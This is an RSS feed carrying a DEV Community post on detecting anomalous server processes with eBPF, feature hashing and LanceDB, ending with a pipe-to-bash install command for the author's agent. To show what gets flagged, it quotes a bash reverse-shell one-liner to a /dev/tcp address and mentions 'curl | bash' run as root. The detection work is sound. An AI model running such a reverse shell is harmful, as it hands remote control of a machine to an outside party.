<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Gretl</title>
    <description>The latest articles on DEV Community by Gretl (@gretl).</description>
    <link>https://dev.to/gretl</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3948466%2Ff08c3d55-4040-4f80-b59f-1d7ec15816c5.png</url>
      <title>DEV Community: Gretl</title>
      <link>https://dev.to/gretl</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/gretl"/>
    <language>en</language>
    <item>
      <title>Detecting unusual processes on your servers without writing a single rule</title>
      <dc:creator>Gretl</dc:creator>
      <pubDate>Sun, 24 May 2026 03:27:41 +0000</pubDate>
      <link>https://dev.to/gretl/detecting-unusual-processes-on-your-servers-without-writing-a-single-rule-2he</link>
      <guid>https://dev.to/gretl/detecting-unusual-processes-on-your-servers-without-writing-a-single-rule-2he</guid>
      <description>&lt;p&gt;Most security tooling works by asking you to define what "bad" looks like upfront. Falco gives you YAML rules. OSSEC has signatures. Wazuh has a 5,000-line ruleset that ships with the product and still misses half of what matters in your specific environment.&lt;/p&gt;

&lt;p&gt;The problem isn't that rules are bad — it's that they can only catch what someone already thought to write a rule for. A novel attack, an unusual deployment pattern, or a rogue process your team introduced six months ago and forgot about will all sail straight through.&lt;/p&gt;

&lt;p&gt;We wanted something different: a system that learns what "normal" looks like on each server and workload automatically, and flags anything that deviates — without any configuration.&lt;/p&gt;

&lt;p&gt;Here's how we built it using eBPF and LanceDB.&lt;/p&gt;

&lt;p&gt;Step 1: Capture everything at the kernel level with eBPF&lt;br&gt;
eBPF lets you attach programs to kernel events with minimal overhead. We attach to the sys_enter_execve tracepoint, which fires every time any process is executed on the machine — before the process even starts running.&lt;/p&gt;

&lt;p&gt;For each execution we capture:&lt;/p&gt;

&lt;p&gt;The process name (comm) and full command line (argv)&lt;br&gt;
The parent process name&lt;br&gt;
The UID of the calling process&lt;br&gt;
Any active network connections (src/dst IP, port)&lt;/p&gt;

&lt;p&gt;This is written in Rust using the Aya framework, which compiles the eBPF kernel program separately and loads it at runtime:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;#[tracepoint]
pub fn gretl_execve(ctx: TracePointContext) -&amp;gt; u32 {
    // A tracepoint program returns u32, so the fallible work lives in a helper.
    match try_gretl_execve(ctx) {
        Ok(ret) =&amp;gt; ret,
        Err(_) =&amp;gt; 1,
    }
}

fn try_gretl_execve(ctx: TracePointContext) -&amp;gt; Result&amp;lt;u32, i64&amp;gt; {
    // Pointer to the filename argument, read from the tracepoint record.
    let filename_ptr = unsafe { ctx.read_at::&amp;lt;u64&amp;gt;(16)? } as *const u8;
    // The upper 32 bits of the helper's return value hold the process ID (tgid).
    let pidtgid = bpf_get_current_pid_tgid();
    let pid = (pidtgid &amp;gt;&amp;gt; 32) as u32;

    let mut event = ExecveEvent {
        pid,
        comm:     [0u8; 16],
        filename: [0u8; 64],
        argv1:    [0u8; 64],
        // ...
    };

    if let Ok(comm) = bpf_get_current_comm() {
        event.comm = comm;
    }

    Ok(emit_execve(&amp;amp;event))
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;The events are written to a ring buffer and consumed by the userspace agent, which batches them and POSTs to the backend every 60 seconds. On kernel ≥ 5.8 with BTF enabled, zero instrumentation is required: no agents inside your containers, no sidecars, no changes to your application code.&lt;/p&gt;

&lt;p&gt;For servers without eBPF support, the Node.js agent falls back to reading /proc/&amp;lt;pid&amp;gt;/cmdline and /proc/&amp;lt;pid&amp;gt;/status directly, tracking new PIDs each interval. You lose the real-time kernel hook but still get the process telemetry.&lt;/p&gt;
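
&lt;p&gt;The polling fallback boils down to two small steps: parse what /proc exposes, and diff the PID list against the previous interval. The sketch below shows one way to do that. The function names parseCmdline and newPids are hypothetical and the agent's real code is not shown in this post; the only fact relied on is that the kernel separates cmdline arguments with NUL bytes.&lt;/p&gt;

```typescript
// Hypothetical helpers for a /proc polling loop (illustrative, not the agent's code).

// /proc/[pid]/cmdline separates arguments with NUL bytes and usually ends with one.
// Empty strings, including the one produced by the trailing terminator, are dropped.
function parseCmdline(raw: string): string[] {
  return raw.split("\0").filter((arg) => arg.length > 0);
}

// Return the PIDs present in the current scan but absent from the previous one.
function newPids(previous: number[], current: number[]): number[] {
  const seen: { [pid: number]: boolean } = {};
  for (const pid of previous) seen[pid] = true;
  return current.filter((pid) => !seen[pid]);
}
```

&lt;p&gt;A diff like this only sees processes that are alive at scan time, so anything that starts and exits between two intervals is missed. That is the trade-off against the kernel hook.&lt;/p&gt;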

&lt;p&gt;Step 2: Represent each process execution as a vector&lt;br&gt;
The raw event — a process name, a cmdline string, a parent process, a port — isn't directly comparable. To measure similarity between executions, we need to turn each event into a fixed-length vector.&lt;/p&gt;

&lt;p&gt;We use feature hashing: tokenise the event fields, hash each token into a position in a 128-dimensional vector, and accumulate signed contributions. The result is normalised to a unit vector.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;function featureVector(event: ProcessEvent): number[] {
  const vec = new Float32Array(128);

  const tokens = [
    event.process_name,
    event.parent_process,
    event.event_type,
    String(event.local_port),
    String(event.remote_port),
    ...tokenise(event.cmdline),   // split cmdline into meaningful tokens
  ];

  for (let i = 0; i &amp;lt; tokens.length; i++) {
    const t = tokens[i].toLowerCase().trim();
    if (!t) continue;
    const idx  = hashStr(t, i * 31) % 128;
    const sign = (hashStr(t, i * 31 + 1) &amp;amp; 1) ? 1 : -1;
    vec[idx]  += sign;
  }

  // L2 normalise so cosine distance is well-defined
  let norm = 0;
  for (let i = 0; i &amp;lt; 128; i++) norm += vec[i] * vec[i];
  norm = Math.sqrt(norm) || 1;
  return Array.from(vec).map(v =&amp;gt; v / norm);
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Feature hashing is deterministic, requires no external model, adds negligible latency, and works well for this kind of structured-text input. A bash -i &amp;gt;&amp;amp; /dev/tcp/... command and a normal bash --login invocation will land in very different regions of the vector space.&lt;/p&gt;
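
&lt;p&gt;The featureVector() function calls hashStr() and tokenise() without showing them. Here is a minimal sketch of what they could look like, assuming a seeded djb2-style hash and a simple character-class split. Both bodies are illustrative assumptions, not the code the agent actually ships.&lt;/p&gt;

```typescript
// Hypothetical helpers: the post uses hashStr() and tokenise() but does not define them.

// Seeded 32-bit string hash (djb2-style XOR variant).
// Always returns a non-negative integer, so "% 128" yields a valid index.
function hashStr(s: string, seed: number): number {
  let h = (5381 + seed) >>> 0;
  for (let i = 0; i !== s.length; i++) {
    // h * 33 stays far below 2^53, so the product is exact before XOR truncates it to 32 bits.
    h = ((h * 33) ^ s.charCodeAt(i)) >>> 0;
  }
  return h;
}

// Split a command line on anything that is not a letter, digit, dot, underscore or dash.
function tokenise(cmdline: string): string[] {
  return cmdline.split(/[^A-Za-z0-9._-]+/).filter((t) => t.length > 0);
}
```

&lt;p&gt;With these helpers, tokenise("curl -fsSL https://example.com/x.sh") yields curl, -fsSL, https, example.com and x.sh. Shell punctuation such as redirects and pipes is discarded, which is a deliberate simplification in this sketch.&lt;/p&gt;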

&lt;p&gt;Why not use a neural embedding model?&lt;br&gt;
We looked at this seriously. Models like all-MiniLM-L6-v2 (22 MB, 384 dims) or OpenAI's text-embedding-3-small would give richer semantic similarity — they know that sh and bash are both shells, that /tmp and /dev/shm are both writable scratch paths.&lt;/p&gt;

&lt;p&gt;The problem is the operational cost at ingestion time. The agent reports process events roughly every 60 seconds per server. For a fleet of 50 servers that's ~3,000 reports per hour (50 servers × 60 reports), and every event in every report needs an embedding call before it can be scored and stored. The options were:&lt;/p&gt;

&lt;p&gt;Local model on the backend: works, but adds a cold-start dependency, ~200 MB of model weights on disk, and 5–20 ms of CPU per event. On a small Fly.io instance shared with the API server, that's noticeable.&lt;br&gt;
External API (e.g. OpenAI): adds network latency to every ingest request, a per-token cost that scales with fleet size, and a hard external dependency that can take your security pipeline down.&lt;br&gt;
Feature hashing: runs in &amp;lt;0.1 ms, zero dependencies, no network calls, fully deterministic. The same input always produces the same vector, which also makes testing straightforward.&lt;/p&gt;

&lt;p&gt;For this specific input (structured fields like process names, parent process names, and cmdline tokens), feature hashing performs surprisingly well. bash -i &amp;gt;&amp;amp; /dev/tcp/10.0.0.1/4444 0&amp;gt;&amp;amp;1 and bash --login land in very different regions of the vector space because their token sets barely overlap. That's all we need for anomaly scoring.&lt;/p&gt;

&lt;p&gt;The embedding layer is intentionally isolated behind a single featureVector() function. Swapping it for a neural model later is a one-function change — the scoring logic, the LanceDB tables, and the API surface don't care what's inside it.&lt;/p&gt;

&lt;p&gt;Step 3: Store and query with LanceDB&lt;br&gt;
LanceDB is an embedded vector database — it runs inside your process, stores data on disk, and supports fast approximate nearest-neighbour search with no separate infrastructure required.&lt;/p&gt;

&lt;p&gt;We create one LanceDB table per (org_id, workload) pair. Each row stores the 128-dim vector and a timestamp. The table grows as new events arrive and old entries are pruned after 7 days.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;export async function scoreAndLearn(
  org_id: string,
  workload: string,
  event: ProcessEvent,
): Promise&amp;lt;number&amp;gt; {
  const conn  = await db();
  const table = await getOrCreateTable(conn, tableName(org_id, workload));
  const vec   = featureVector(event);

  // Find k=10 nearest neighbours in this workload's history
  const results = await table.vectorSearch(vec).limit(10).toArray();

  let score = 1.0; // default: completely unseen
  if (results.length &amp;gt; 0) {
    const distances = results.map(r =&amp;gt;
      cosineDistance(vec, Array.from(r.vector))
    );
    const minDist = Math.min(...distances);
    score = Math.min(1, minDist * 2); // scale to 0–1
  }

  // Add this event to the baseline for future comparisons.
  // Await the write so a failed insert is not silently dropped.
  await table.add([{ vector: vec, ts: Date.now() }]);

  return score;
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;The anomaly score is 0 for an event that exactly matches one already in the baseline, and 1 for something completely new. It gets stored alongside the event in ClickHouse so you can query, filter, and alert on it.&lt;/p&gt;
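
&lt;p&gt;scoreAndLearn() relies on a cosineDistance() helper that is not shown. The sketch below is one plausible version, together with the score mapping pulled out into a pure function so it can be tested without a database. The name anomalyScore and the zero-vector handling are assumptions made for illustration.&lt;/p&gt;

```typescript
// Hypothetical helper: cosineDistance() is used in the post but not defined there.
function cosineDistance(a: number[], b: number[]): number {
  let dot = 0;
  let normA = 0;
  let normB = 0;
  const n = Math.min(a.length, b.length);
  for (let i = 0; i !== n; i++) {
    dot += a[i] * b[i];
    normA += a[i] * a[i];
    normB += b[i] * b[i];
  }
  const denom = Math.sqrt(normA) * Math.sqrt(normB);
  // Assumption: a zero vector has no direction, so treat it as unrelated.
  if (denom === 0) return 1;
  return 1 - dot / denom;
}

// Same mapping as scoreAndLearn(): nearest-neighbour distance, doubled and capped at 1.
function anomalyScore(vec: number[], neighbours: number[][]): number {
  if (neighbours.length === 0) return 1.0; // nothing in the baseline yet
  const minDist = Math.min(...neighbours.map((nb) => cosineDistance(vec, nb)));
  return Math.min(1, minDist * 2);
}
```

&lt;p&gt;Because the distance is doubled before capping, any event whose nearest neighbour sits at a cosine distance of 0.5 or more receives the maximum score of 1.&lt;/p&gt;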

&lt;p&gt;Step 4: Natural language search&lt;br&gt;
Once every event is a vector, querying by description becomes trivial. We embed the search query using the same feature-hashing pipeline and run a nearest-neighbour search across all workload tables.&lt;/p&gt;

&lt;p&gt;// In the dashboard Security tab:&lt;br&gt;
// "show me anything that looks like a reverse shell"&lt;/p&gt;

&lt;p&gt;POST /telemetry/security/search&lt;br&gt;
{ "query": "reverse shell bash outbound connection" }&lt;/p&gt;

&lt;p&gt;This returns the events whose vectors are closest to the query vector. Because the query goes through the same hashing pipeline, closeness comes from tokens the query shares with an event rather than from any understanding of what the words mean: a process running bash -i &amp;gt;&amp;amp; /dev/tcp/10.0.0.1/4444 0&amp;gt;&amp;amp;1 can rank highly through the shared bash token even though it doesn't contain the literal words "reverse shell".&lt;/p&gt;

&lt;p&gt;What it looks like in practice&lt;br&gt;
After running on a production server for a few days, the baseline learns what "normal" looks like: your web server process, your cron jobs, your deployment scripts. Then:&lt;/p&gt;

&lt;p&gt;A developer accidentally leaves a debug shell running → anomaly score 0.85, flagged as warn&lt;br&gt;
Your CI/CD pipeline runs a new build script for the first time → score 0.72 on first run, drops to 0.1 after the second run&lt;br&gt;
Someone runs curl | bash as root → score 0.94, flagged immediately&lt;br&gt;
Your usual nginx worker restarts → score 0.02, ignored&lt;/p&gt;

&lt;p&gt;No rules were written for any of these. The system learned the baseline automatically and the deviations surfaced on their own.&lt;/p&gt;

&lt;p&gt;The architecture in one diagram&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Server                    Backend                   Storage
──────                    ───────                   ───────

eBPF (kernel) ──execve──▶ /otlp/v1/events
                               │
/proc fallback ──────────▶     │
                               ▼
                        featureVector()
                               │
                               ▼
                        LanceDB (per workload) ──▶ anomaly_score
                               │
                               ▼
                        ClickHouse.security_events
                               │
                               ▼
                        Dashboard + NL search
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;What's next&lt;br&gt;
The current embedding is purely structural: it knows that bash and sh are different tokens, but doesn't know they're semantically similar shells. Upgrading to a small neural embedding model (something like all-MiniLM-L6-v2) would improve natural language search quality significantly, especially for queries phrased in plain English rather than technical terms.&lt;/p&gt;

&lt;p&gt;We're also working on per-workload alert thresholds — so a security-sensitive production workload can be configured to alert at score 0.6, while a noisy dev environment uses a higher threshold of 0.85.&lt;/p&gt;
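
&lt;p&gt;Since this feature is still in progress, the following is only a sketch of how a per-workload lookup might behave. The workload names, the shouldAlert function, and the fallback default are all hypothetical; only the 0.6 and 0.85 values come from the text above.&lt;/p&gt;

```typescript
// Hypothetical configuration shape, not the product's actual API.
const DEFAULT_THRESHOLD = 0.85; // assumed fallback for workloads with no override

const thresholds: { [workload: string]: number } = {
  "payments-prod": 0.6, // security-sensitive: alert earlier
  "dev-sandbox": 0.85,  // noisy environment: alert only on strong anomalies
};

// Decide whether a scored event should raise an alert for its workload.
function shouldAlert(workload: string, score: number): boolean {
  const hasOverride = Object.prototype.hasOwnProperty.call(thresholds, workload);
  const threshold = hasOverride ? thresholds[workload] : DEFAULT_THRESHOLD;
  return score >= threshold;
}
```

&lt;p&gt;With this configuration, a score of 0.72 would alert on payments-prod but stay quiet on dev-sandbox.&lt;/p&gt;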

&lt;p&gt;Try it on your servers&lt;br&gt;
The agent installs in one command and starts building a baseline immediately. Works on any Linux server — EC2, GCP, bare metal. eBPF on kernel ≥ 5.8, /proc fallback everywhere else.&lt;/p&gt;

&lt;p&gt;GR_TOKEN=your-token bash &amp;lt;(curl -fsSL &lt;a href="https://gretl.dev/install-agent.sh" rel="noopener noreferrer"&gt;https://gretl.dev/install-agent.sh&lt;/a&gt;)&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F85gyx4xg0tfdug1uu7d7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F85gyx4xg0tfdug1uu7d7.png" alt=" " width="800" height="533"&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>linux</category>
      <category>machinelearning</category>
      <category>monitoring</category>
      <category>security</category>
    </item>
  </channel>
</rss>
